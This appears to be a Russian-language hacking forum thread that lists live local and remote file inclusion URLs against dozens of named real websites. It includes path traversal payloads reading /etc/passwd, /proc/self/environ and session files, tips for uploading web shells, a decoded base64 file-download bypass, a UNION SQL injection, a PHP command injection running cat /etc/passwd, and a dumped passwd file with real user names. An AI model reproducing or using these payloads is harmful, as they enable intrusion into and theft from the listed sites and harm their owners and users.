http://www.barapp.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.ninabonos.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.taylortaylorlondon.com/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.math.umd.edu/~dcarrera/bsm/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.carey.wa.edu.au/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://remerge.sourceforge.net/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://melissaphillippe.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.monkeyircd.org/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://nakabayashi-kensetsu.co.jp/recruit/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.solumandherbe.com/index.cgi/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://careers.eaglesold.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.californiafleurish.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://ultrateq-digital.co.uk/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.studionouveau.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://freeresalerights.lescigales.org/?page=../../../../../../../../../../../../../etc/passwd%00qwe123


антибоян - google

Директория

http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

Файл в ней

http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME

Банка,
multibanka.com

Берёт файл, например:

http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRh b2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdX RzbGF2XzI9ZW1hbl9lbGlm

Base64!
Декодируем:

sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utsl av_2=eman_elif

^_^

file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu

Делаем по умному /etc/passwd

/cte/=htap_elif;dwssap=eman_elif

И берём его :)

http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=

такая вот шн*га.

P.S:

get_file.php



include "include_php/my_encoder.php";


decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf')
header('Content-type: application/pdf');

//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));



$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);

echo $data;



my_encoder.php



function encode_str($string) {
return base64_encode(strrev($string));
}


function decode_str($string) {
$result = strrev(base64_decode($string));

// SQL injection tests

if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
Header("Location: http://www.bs.lv/track_hacker.php");
}

$tmp_arr=split(";",$result);

for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
$ta = split("=",$tmp_arr[$i]);

if ($ta['0']) {
$_GET[$ta['0']] = $ta['1'];
}
}

}

http://www.lastminute-music.com/index.php?inc=/etc/passwd


http://www.pubs.org.au/index.php?inc=/etc/passwd

тИЦ: 50
PR: 4

RFI
http://www.bloodfmba.ru/news/mir.php?id=RFI

http://www.centerforloss.com/articles.php?file=
Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.


http://www.matchmaking.at/athen2008/index.php?file=

локальный инклюд.
что то ненашёл /etc/passwd

http://www.westbalkanresearch.net/index.php?file=

Такая же беда :(

PR4

LFI

http://www.akademiaurody.com/index.php?id=[LFI]

LFI

тИЦ 240
PR 5/10
http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd

На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

LFI
http://www.uvm.edu/student_life/?Page=../phpinfo.php

ну и от меня кусочек

http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00

http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd

http://www.halalapalooza.com/d.php?id=[LFI]

http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00 PR7, тИЦ 2100

Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

Кстати, на хостинге лежит дистрибутив windows xp sp3)

И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?

http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd

http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00

http://stanleycup.crash.sk/sc.php?id=[LFI]
http://www.dalcomstechnologies.com/pricing.php?id=[LFI]

http://www.pillows.jp/20th/p/index.php?page=../../../../../../../../../../../../etc/passwd%00

Инъекции на 2ух японских сайтах

http://www.holos.jp/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/group

http://mobasp.jp/page.php?cat=../../../../../../../../../../../../../../../../../../../../etc/passwd

Опять решил полазить поискать php inj:

http://www.fitnessmanager.ru/index.php?page=../../../../../../../etc/passwd

http://www.handballneuchatel.ch/httpdocs/index.php?inc=../../../etc/passwd%00
http://www.robotsandbotanics.de/index.php?inc=../../../../../../../../etc/passwd%00
http://www.tasteone-medientechnik.de/index.php?inc=../../../../../../../etc/passwd%00
http://www.haldergmbh.de/index.php?inc=/etc/passwd
http://blesk.issa.cz/index.php?inc=index.php%00

http://wow.crpg.ru/modules.php?op=modload&name=..&file=index
просмотр файлов

http://iea.uoregon.edu/page.php?query=static&file=/../../../../../../../../../../../../../etc/passwd
http://occs.odu.edu/page.php?page=news_security/../../../../../../../../../../../../../../../../../../../../etc/passwd
http://languagesupport.msu.edu/page.php?toggle=5&id=SectionProfDev/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

http://www.lambproject.org/content.php?tt=../../../../../../etc/passwd&pc1=&pc2=spacer&pc3=spacer&origin=

http://www.veye.com.ua/doc.php?d=../

http://www.emini-collection.ch/index.php?file=../../../../etc/passwd%00
http://www.jolly-dent.de/index.php?file=/etc/passwd%00
http://www.e-medica.jp/index.php?file=../../../../../etc/passwd%00

http://www.eximoforta.ru/index.php?file=index.php цикл index.php

http://www.ruspi.ru./?page=[local]

http://www.ie.rmutk.ac.th/index.php?file=../../../../../../../etc/passwd

http://www.cdu-rhauderfehn.de/index.php?folder=pages&file=../../../../../../../etc/passwd

http://yuanpei.pku.edu.cn/old/index.php?option=com_content&task=view&id=[RFI]

http://www.tzimakos.gr/print.php?id=/proc/self/environ

http://my.getmorediamonds.com/getstarted.php?id=index.php&url=../../../../../../etc/passwd

http://www.joeplecker.com/display.php?id=/proc/self/environ

http://petercottontailpreschool.com/index.php?id=/etc/passwd

http://pvp-game.ru/index.php?act=../index цикл index.php

Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--

Идёт файл на загрузку, в имени файла вывод:

5.0.51a-3ubuntu5.4

подставим своё значение:
magic qutes = on, поэжтому захексим

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--

И скачиваем /etc/passwd :)

presentations.php


error_reporting(0);
mysql_connect("localhost","*","*");
mysql_select_db( "owls08" );
error_reporting(1);

$id = mysql_real_escape_string( $_REQUEST['id'] );

$query="SELECT file from presentations where id=$id";
$result = mysql_query( $query ) or die( mysql_error() );
$row = mysql_fetch_array( $result );

$file = $row['file'];

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($file));
header( "Content-Description: File Transfer");
@readfile($file);

http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd

http://www.duma.gov.ru/index.jsp?t=./index.jsp

http://www.summerschoolalpbach.at/index.php?file=index.php
http://www.b2match.com/watervienna09/index.php?file=index.php
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd

http://sdm.mit.edu/index.php?fileName=index.php

http://stroycement.ru/stat.php?p=../../../../etc/passwd

http://dnfo.ru/page.php?p=../page
http://www.kamp.ru/page.php?p=page&board=1

European investment banking firm
http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd

http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd

http://www.gnpbu.ru/index.php?file=../index.php
http://wnr.economicus.ru/index.php?file=../index
http://www.eximoforta.ru/index.php?file=index.php

www.oUNIX.ru - о UNIX-системах.

http://www.ounix.ru/index.php?page=../admin/index&id=8

la2
http://la2rasta.ru/index.php?f=index

http://www.physics.carleton.ca/atlas/index.php?file=../../../../../../../../../../../etc/passwd

http://www.abei.it/index.php?file=../../../../../../../../../../../etc/passwd&sezione=Convegno%20Nazionale%202008&menu=Programma

http://www.enterprise-europe-network.ch/marketplace/index.php?file=../../../../../../../../../../../etc/passwd

http://mypara.ru/index.php?page=index
http://www.autodafe.ru/index.php?page=../index

http://wework.philaforum.com/index.php?site=http://google.com/search?q=

http://www.ruvr.ru/index.php?lng=../../../../../../../../../../../../../../etc/passwd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

http://www.myperfecthalf.com/forum/topic.php?topic_id=364&language_id=../../../../../../etc/passwd%00

http://www.myperfecthalf.com/member/toprated_list.php?view_mode=gallery&language_id=../../../../../../etc/passwd%00&page=32&command=online
http://kneuro.net/littlesite/index.php?file=/etc/passwd

http://www.prodisney.ru/index.php?page=index.php

http://www.automoto66.ru/index.php?state=other&file=../../../../../../etc/passwd&page=2
http://www.mainechiropractic.org/index.php?file=/etc/passwd%00

http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00

http://www.villaaqva.com/index.php?page=../../../../../../../proc/self/fd/2%00

http://www.angel-bal.ru/?flash=0&pg=text.php&path=../../../../../../../../../../../etc/passwd

http://www.menopausethemusical.com/main.php?page=../../../../../../../proc/self/fd/2%00&getshow=210

http://rgsu.by/index.php?cat=../../../../boot.ini%00/*

http://www.dateautismsingles.com/member/sign_in.php?language_id=../../../../../../etc/passwd%00

http://realasianlove.com/faq.php?language_id=../../../../../../../../etc/passwd%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/environ%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/fd/2%00

http://rsvpsinglelife.com/member/links_directory.php?language_id=../../../../../../etc/passwd%00
http://rsvpsinglelife.com/phpinfo.php

http://www.mingleifsingle.com/about.php?language_id=../../../../../../etc/passwd%00
http://www.mingleifsingle.com/about.php?language_id=../../../../../..//home/mingleif/etc/mingleifsingle.com/shadow%00

http://www.futbolcontactos.com/forum/forum.php?language_id=../../../../../../etc/passwd%00

http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../etc/passwd%00
http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../proc/self/fd/2%00

http://umadevi-artgallery.com/?file=/home/umadevia/public_html/_vti_pvt/service.pwd&flashContent=c2

http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../etc/passwd%00
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../proc/self/fd/2%00

Cтоит движок производства "SkaDate social networking software"
Лить шелл удобно через сессию, смотрим куки, ищем сессию
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../tmp/sess_ee1f74898b80f31c2848a56c24b0048a%00

аналогичная история
http://www.swingland.dk/member/join.php?language_id=../../../../../../../../etc/passwd%00

на хостинге aston.skadate.com
http://www.citasrapidas.com.mx/member/join.php?language_id=../../../../../../etc/passwd%00
http://www.cosmicties.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.duhlan.com/top_rated_photos.php?language_id=../../../../../../etc/passwd%00
http://www.exoticity.net/member/media_view.php?language_id=../../../../../../etc/passwd%00
http://www.myflingdate.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.rightmate.net/forum/topic.php?topic_id=6&language_id=../../../../../../etc/passwd%00
http://www.sawasdeeka.com.au/faq.php?language_id=../../../../../../etc/passwd%00
http://www.swinging4pleasure.com/contact.php?language_id=../../../../../../etc/passwd%00

sosolid2k.co.uk

http://www.sosolid2k.co.uk/site.php?page=../../../../../../../../etc/passwd

а также

http://www.sosolid2k.co.uk/guides/monsters/monster-guide.php?
monster=../../../../../../../../etc/passwd

conservatoryoutlet.co.uk

http://conservatoryoutlet.co.uk/shop.cgi?page=../../../../../../../etc/passwd

http://www.rounder.com/index.php?id=index.php&newsId=973



http://www.mvizru.ru/index.php?id=index.php



http://www.keller.com.ua/index.php?id=index.php

http://www.electrolatrine.net/uk/index.php?page=index.php
http://www.roleplay2.com/index.php?page=index.php

http://blangkonet.co.cc/index.php?page=index.php

http://voice-sms.net/index.php?page=index.php

http://www.je.au.com/common/file.php?file=../../../../../../../../etc/passwd

Как бэ качалка.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
accassar:x:1000:1000:,,,:/home/accassar:/bin/bash
spong:x:102:65534::/var/lib/spong/tmp:/bin/false
automation:x:1003:50:,,,:/usr/local/automation:/bin/false
postfix:x:103:101::/var/spool/postfix:/bin/false
nagios:x:104:104::/var/log/nagios:/bin/false
Debian-exim:x:107:107::/var/spool/exim4:/bin/false
dmargas:x:1005:1005:Dariusz Margas,,,:/home/dmargas:/bin/bash
cchen:x:1001:1001:,,,:/home/cchen:/bin/bash
csmall:x:1002:1002:,,,:/home/csmall:/bin/bash
statd:x:101:65534::/var/lib/nfs:/bin/false
snmp:x:105:65534::/var/lib/snmp:/bin/false
oident:x:106:108::/:/bin/false
ntp:x:109:109::/home/ntp:/bin/false
cgregg:x:1006:1003:,,,:/home/cgregg:/bin/bash
libuuid:x:110:201::/var/lib/libuuid:/bin/sh
jmullins:x:1004:1004:,,,:/home/jmullins:/bin/bash

http://www.anat.stonybrook.edu/IDPAS/index.php?page=../../../../../../../../etc/passwd%00

http://www.speakmania.com/index.php?language_id=../../../../../../../../etc/passwd%00

http://www.kristinalucas.com/img.php?id=2/../../index.html%00&pf=1

http://www.prezident.md/const.php?lang=anti - кто сможет раскрутить +5.

http://www.sarznak.ru/forum/forumdisplay.php?fid=2&sortby=%27];system%28%27cat%20/etc/passwd%27%29;exit;//

http://hiphopgame.ihiphop.com/index2.php3?page=../../../../../../../../etc/passwd%00

http://www.warnerfamilychiropractic.com/index.php?file=../../../../../../../../../etc/passwd%00

http://www.heitmannplus.no/litteratur/index_artikkel.php4?nyhetsoverskrift=Grunnleggende %20antagelser%20for%20et%20nytt%20%E5rhundre&artikkel_id=../../../../../../../../../../../../../etc/passwd

http://adirondackchiropractic.com/index.php?file=../../../../../../../../etc/passwd%00&documentName=ywtl
без socks не пускает, м.б. страна не нравится или обнаруживает прокси

http://www.termassaojoao.com.br/index.php?conteudo=/etc/passwd

http://www.metaltotal.ru/index.php?file=index.php

http://www.bsgpilots.com/Themes/XD-Reborn/index.template.php?cmd=ls
Не совсем по теме, но всё же...
ЗЫ: Шелл льётся без проблем :)